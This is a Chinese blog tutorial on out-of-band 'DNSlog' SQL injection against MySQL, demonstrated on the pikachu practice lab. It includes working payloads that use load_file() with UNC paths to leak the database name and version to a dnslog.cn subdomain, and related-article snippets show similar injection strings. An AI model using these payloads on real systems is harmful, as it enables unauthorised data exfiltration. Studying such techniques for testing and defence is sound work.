DNSlog注入姿势

最新推荐文章于 2024-10-06 18:09:49 发布
最新推荐文章于 2024-10-06 18:09:49 发布
阅读量864 收藏 3
点赞数 1
分类专栏: 笔记 文章标签: mysql 服务器 渗透测试 sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43681802/article/details/113754276
版权

DNSlog注入(mysql数据库sql注入姿势)

简介:本文记录sql注入中的注入姿势DNSlog注入原理及其构造payload过程

文章目录

前言

DNSLOG注入不是一种新的sql注入方式,而是一种注入姿势。方便为我们进行sql注入提供方法

提示:以下是本篇文章正文内容,下面案例可供参考

一、什么是DNS(域名系统)?

DNS(Domain name system)域名系统,它作为将域名和IP地址相互映射的一个分布式数据库,能够使人更方便地访问互联网。为了方便人们记忆目标网站地址,人们只需通过访问域名来访问目标网站,通过DNS将域名映射的ip地址进行访问目标服务器。

DNS域名解析过程如下:
在这里插入图片描述
下面来详细解释DNS域名解析的过程:

DNS客户端就是我们平常使用的电脑,打开浏览器,输入一个域名。比如输入www.163.com,这时浏览器会查看其缓存是否有对应的域名映射,有就直接解析,否则就交由DNS客户端(主机)进行查询。DNS客户端检查本地缓存是否存在目标映射关系,存在就直接解析,否则就将发送DNS请求到本地DNS服务器。本地DNS服务器一般都是你的网络接入服务器商提供,比如中国电信,中国移动等

查询www.163.com的DNS请求到达本地DNS服务器之后,本地DNS服务器会首先查询它的缓存记录,如果缓存中有此条记录,就可以直接返回结果。如果没有,本地DNS服务器还要向DNS根服务器进行查询。

根DNS服务器没有记录具体的域名和IP地址的对应关系,而是记录顶级域名服务器的ip地址。收到根域名服务器的DNS请求,检查顶级域名为.com,将.com顶级域名地址发送到本地DNS服务器。告诉本地服务器到顶级域名服务器上去查询

本地DNS服务器继续向顶级域名服务器发出请求,在这个例子中,请求的对象是.com域服务器。.com域服务器收到请求之后,也不会直接返回域名和IP地址的对应关系,而是告诉本地DNS服务器其子域名(163.com)服务器的地址。

最后,本地DNS服务器向子域名服务器(163.com)发出请求,本地DNS服务器就能收到一个域名和IP地址对应关系,本地DNS服务器不仅要把IP地址返回给用户电脑,还要把这个对应关系保存在缓存中,以备下次别的用户查询时,可以直接返回结果,加快网络访问。

二、DNSlog注入

注入场景

适用于那些sql注入无回显的场景。可以使用盲注,但盲注花费时间过长且繁琐,效率低对一些拥有waf的网站存在被禁止ip的风险高

注入具备条件

1.数据库配置使得load_file()函数发送请求

通过DNSlog盲注需要用的load_file()函数,所以一般得是root权限。在数据库中输入show variables like ‘%secure%’ 查看secure_file_priv属性
在这里插入图片描述
如Mysql中的secure_file_priv属性,将其设置为空,则可以导入导出文件。

通过设置my.ini文件。若my.ini中没有直接添加即可
在这里插入图片描述

什么是UNC路径?

UNC为网络(主要指局域网)上资源的完整Windows 名称。
格式:\\servername\harename,其中servername是服务器名。sharename是共享资源的名称。

目录或文件的UNC名称可以包括共享名称下的目录路径,格式为:\\servername\sharename\directory\filename

2.拥有DNS服务器接收并记录从数据库发送过来的请求(DNS解析请求)

这里采用在线DNS服务器网站
http://www.dnslog.cn/
在这里插入图片描述

1.注入原理

就是拼接语句,借助开发数据库可能配置了函数load_file(),通过函数发送请求,将sql语句查询的结果带出来给我们自己设置的DNS服务器解析,通过日志记录可以看到sql语句查询信息

2.注入过程

在数据库(pikachu)进行测试load_file()函数,带着数据库名发送DNS解析请求给DNS服务器。

1.测试load_file()函数

截图如下(示例):
在这里插入图片描述
DNS服务器返回解析日志记录,域名为pikachu.x
h198t.dnslog.cn,。则此时的数据库名称为pikachu
在这里插入图片描述
我们来看下load_file()函数的sql语句:

select load_file(concat('\\\\',(select database()),'.xh198t.dnslog.cn\\adc'))

使用UNC路径\servername\harename
语句中输入的’ \\\\ ’ 由于会对’ \ ‘进行转义,’ \\\\ ‘转义后得到’ \\ '。中间的拼接sql查询语句,后面紧跟得到的域名及共享文件。使用concat()函数将三者拼接。

2.测试SQL盲注
构造如下payload:
kobe’ union select load_file(concat(’\\’,(select version()),’.x55aze.dnslog.cn\adc’))#
在这里插入图片描述
提交后在DNS服务器上得到版本号为5.6.17

在这里插入图片描述

总结

本文记录了DNSlog注入姿势适合于在SQL盲注的场景,并且通过了解DNSlog注入的原理及其使用load_file()函数实现在DNS服务器上显示在SQL语句中查询的信息。

小透明haoyun
关注
专栏目录
26-4 SQL注入攻击 - 不同数据库系统利用dnslog姿势
weixin_43263566的博客
03-12 138
函数来执行文件读取操作,并通过注入恶意代码来触发 DNS 解析以传输数据到 DNSLog 平台。函数,触发 DNS 解析并将数据传输到 DNSLog 平台,实现数据的传送和记录。函数和恶意注入代码来实现数据传输至 DNSLog 平台,进而利用 DNSLog 来获取数据或执行进一步的操作。先进入mysql的命令行:其他菜单选项 --> MySQL工具 --> MySQL命令行。这段代码是在 MySQL 数据库中执行的恶意注入操作,旨在通过。通过这种方式,攻击者可以利用恶意注入操作来利用数据库管理系统的。
mysql dns 注入_数据库DNSLog外带注入-总结
weixin_29279047的博客
01-19 1000
sql注入中利用的骚姿势你又知道几个?DNSLog外带注入DNSlog带外注入?(OOB)其实是一样的,叫法不同!本人还是习惯叫外带注入,自我感觉,比较顺口为什么需要外带注入?当我们对一个数据库进行注入时,无回显,且无法进行时间注入,那么就可以利用一个通道,把查询到数据通过通道带出去,这里的通道包括:http请求、DNS解析、SMB服务等将数据带出。of course!这里主讲DNSlog外带注...
SQL注入DNS_log注入
weixin_47785246的博客
07-11 904
SQL注入DNS_log注入 这篇文章将系统的讲解,SQL注入中的DNS_log注入的原理、方法、以及靶场练习writeup。 文章目录SQL注入DNS_log注入前言一、DNS_log注入原理二、靶场实战1.DNSlog 平台2.封神台靶场总结 前言 关于SQL注入的详细内容请看我之前写的文章 提示:以下是本篇文章正文内容,下面案例可供参考 一、DNS_log注入原理 我们都知道,DNS解析是一种用户访问域名时,客户端向DNS发起DNS查询的到目标服务器ip地址,进而实现通信的机制,而
DNSLog注入
一期一会的博客
01-13 4380
DNSLog注入原理 在sql注入时为布尔盲注、时间盲注,注入的效率低且线程高容易被waf拦截,又或者是目标站点没有回显,我们在读取文件、执行命令注入等操作时无法明显的确认是否利用成功,这时候就要用到我们的DNSlog注入。 首先需要有一个可以配置的域名,比如:xxx.io,然后通过代理商设置域名 xxx.io 的 nameserver 为自己的服务器 A,然后再服务器 A 上配置好 DNS Server,这样以来所有 xxx.io 及其子域名的查询都会到 服务器 A 上,这时就能够实时地监控域名查询请
DNSlog注入原理
最新发布
wanggonghanfei的博客
10-06 848
dnslog注入也相当于盲注的一种,但是比盲注效率高一点。在一定的情况下,如果我们想对一个网站使用布尔或时间盲注,手动注入会对WAF的绕过会非常有帮助,但是效率不高,因此我们往往会使用SQLmap等工具注入,但是这种工具对很多网站都有限制。这时候就该尝试DNSlog注入。这种注入方式,相较于布尔或时间盲注而言,好处在于可以一组一组进行测试,不用再一个一个字符进行逐以测试,比其他两个盲注效率要高,但是要求服务器的读写权限都要对MySQL开启,如果没有开启的话,是不能使用这种注入方式的。
SQL注入学习-Dnslog盲注
笑花大王
02-17 714
1.基础知识 1.DNS DNS(Domain Name System,域名系统),因特网上作为域名和IP地址相互映射的一个分布式数据库,能够使用户更方便的访问互联网,而不用去记住能够被机器直接读取的IP数串。通过主机名,最终得到该主机名对应的IP地址的过程叫做域名解析(或主机名解析)。DNS协议运行在UDP协议之上,使用端口号53。在RFC文档中RFC 2181对DNS有规范说明,RF...
SQL注入DNS盲注
SDM_JH的博客
07-28 331
一、准备一个自己的域名 利用DNS进行sql盲注需要一个拥有可以修改dns权限的域名,然后需要在你的DNS服务器上把需要注入的域名委托到攻击机上,也就是当请求你域名中的子域的解析请求都会解析到攻击机,然后我们在攻击机监听53 端口即可。 二、构造注入语句 注入语句:http://域名/test.php?user=root' and load_file(concat('\\\\',(select database()),'添加的子域名\\aaa'))# 可以利用sqlmap中的dns.py脚本监听53端
sql盲注进阶篇-dnslog盲注
十五年游戏主程转渗透之路
03-31 3571
dnslog注入
https防止注入_数据库DNSLog外带注入总结
weixin_39553600的博客
11-20 605
sql注入中利用的骚姿势你又知道几个?DNSLog外带注入DNSlog带外注入?(OOB)其实是一样的,叫法不同!本人还是习惯叫外带注入,自我感觉,比较顺口为什么需要外带注入?当我们对一个数据库进行注入时,无回显,且无法进行时间注入,那么就可以利用一个通道,把查询到数据通过通道带出去,这里的通道包括:http请求、DNS解析、SMB服务等...
dnslogmysql在linux_DNSlog平台各种利用姿势(盲注)
weixin_30588427的博客
02-23 657
题记首先祝大家新年快乐,过年给我最大的感觉就是几家欢喜几家愁,我们国家总量看似光鲜,可是平均下来也不多,小老百姓更不容易了,一般没有文化的百姓除了创业就是打工就是中间商赚差价,真是生活不易,加油,一起建设新中国。DNSlog我以前是通过看推文了解过,后来零组上架了这么个功能,想着试试,后来发现零组的好像还用不了,还是用别的平台吧,这是可以利用它进行快速盲注的工具,看完大佬们的文章复现完受益良多,g...
利用DNSLOG获取看不到的信息(给盲注带上眼镜)
wodafa的博客
04-27 3195
毕业设计总算搞得差不多了,这个心累啊。 这不,完成了学校的任务,赶紧回来给蛋总交作业。 今天给大家分享一个姿势吧,不是什么新东西,但比较少见——用DNS log来获取回显。
DNSLOG注入
秋水的博客
09-02 8940
注入简介 什么是dnslog注入dnslog注入也可以称之为dns带外查询,是一种注入姿势,可以通过查询相应的dns解析记录,来获取我们想要的数据 为什么要进行dnslog注入? 一般情况下,在我们无法通过联合查询直接获取数据的情况下,我们只能通过盲注,来一步步的获取数据,但是,使用盲注,手工测试是需要花费大量的时间的,可能会想到使用sqlmap直接去跑出数据,但在实际测试中,使...
dnslogsql注入
weixin_44894463的博客
07-09 265
前两天看到了一个骚姿势,没有回显的时候利用dnslog来得到数据库名等。 可以在一个网站上注册ceye.io,注册就可以得到一个二级域名。 用到了load_file() ,用法是load_file(文件名),比如这样:select load_file(concat(’\\’,database(),’.xxxx.ceye.io\fwafw’)); 这个就相当于访问了table_schema.xxx...
DNSlog注入
7Riven's blog
12-31 942
DNSlog注入产生 测试一些网站的时候,一些注入都是无回显的,可以通过写脚本来进行盲注,但有些网站会ban掉我们的ip,可以通过设置ip代理池解决,但是盲注往往效率很低,所以产生了DNSlog注入DNSlog注入应用场景 sql注入的盲注、无回显的命令执行、无回显的SSRF DNSlog注入原理 有一个可以配置的域名(比如:ceye.io),然后通过代理商设置域名(ceye.io)...
深度剖析DNSLog注入原理&本地实例测试
monster663的博客
02-08 7058
声明:本文仅做学习交流探讨之用,切勿用于违法用途,请遵循《中华人民共和国网络安全法》,共同维护清朗的网络空间 Dns_log注入简介 我们将利用DNS解析的过程将留下痕迹和mysql中load_file()函数的能够访问互联网中的文件这一特点,将一些渗透的过程中将我们需要测试网站的结果回显到一个特定的可以记录DNS日志网站中,关于DNS的原理请参考https://blog.csdn.net/king9666/article/details/106022050 应用场景 DNS_log注入常用于网站对
DNSLog使用笔记
糖小喵
09-27 5345
首先DNSlog网址:http://www.dnslog.cn/ 一般用作回显,这里会记录请求,也就是记录DNS访问记录的东西,同样在局域网可用http服务。
Web安全和渗透测试有什么关系?
Python_0011的博客
03-31 1289
渗透测试的一个环节就是测试web安全,需要明白漏洞产生原理,通过信息收集互联网暴露面,进行漏洞扫描,漏洞利用,必要时进行脚本自编写和手工测试,力求挖出目标存在的漏洞并提出整改建议,当然如果技术再精一些,还要学习内网渗透(工作组和域环境),白盒审计,app,小程序渗透那些了......可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。当然除了有配套的视频,同时也为大家整理了各种文档和书籍资料&工具,并且已经帮大家分好类了。总之,web安全包含于渗透测试,但不是渗透测试的全部。
DNSLog漏洞探测(四)之RCE漏洞实战
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
12-12 955
这个探测RCE漏洞的重点不在于 ping 通了什么样的服务器,而是在于验证该服务器是否能直接 ping 通外网,如果使用DNSLog平台去探测该RCE漏洞没有出现DNSLog解析记录,则证明该服务器不能直接连接外网。现在我们回到DNSLog服务平台,点击 Refresh Record刷新,然后DNSLog服务平台便会返回给我们DNSLog解析记录,这下我们就通过DNSLog平台验证了该处存在RCE漏洞。有关于RCE漏洞的DNSLog平台利用其实非常的简单,只需要在文本框去提交我们得到的子域名就好了。
封神台 dnslog注入
weixin_43836174的博客
08-27 673
靶场地址:http://59.63.200.79:8022/cat/?id=1 第一步 注入点寻找 寻找注入点,初步判断id=1处为注入点 尝试 试用 and 1=1 返回成功 1=2 报错 第二步 初步测试注入 找到注入点试用 order by n 查询 ![](https://nc0.cdn.zkaq.cn/md/6263/bdf6430495304a773942341564db2105_12336.png) 发现可以回显的字符是2为 使用 union select 1,...
dnslog注入原理
07-29
DNSLog注入是一种利用DNS协议的安全漏洞进行攻击的方法。它利用了DNS服务器对于域名解析请求的处理方式,通过在恶意构造的域名中插入恶意代码,从而实现对目标系统的攻击或信息收集。 具体的注入原理如下: 1. DNS...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值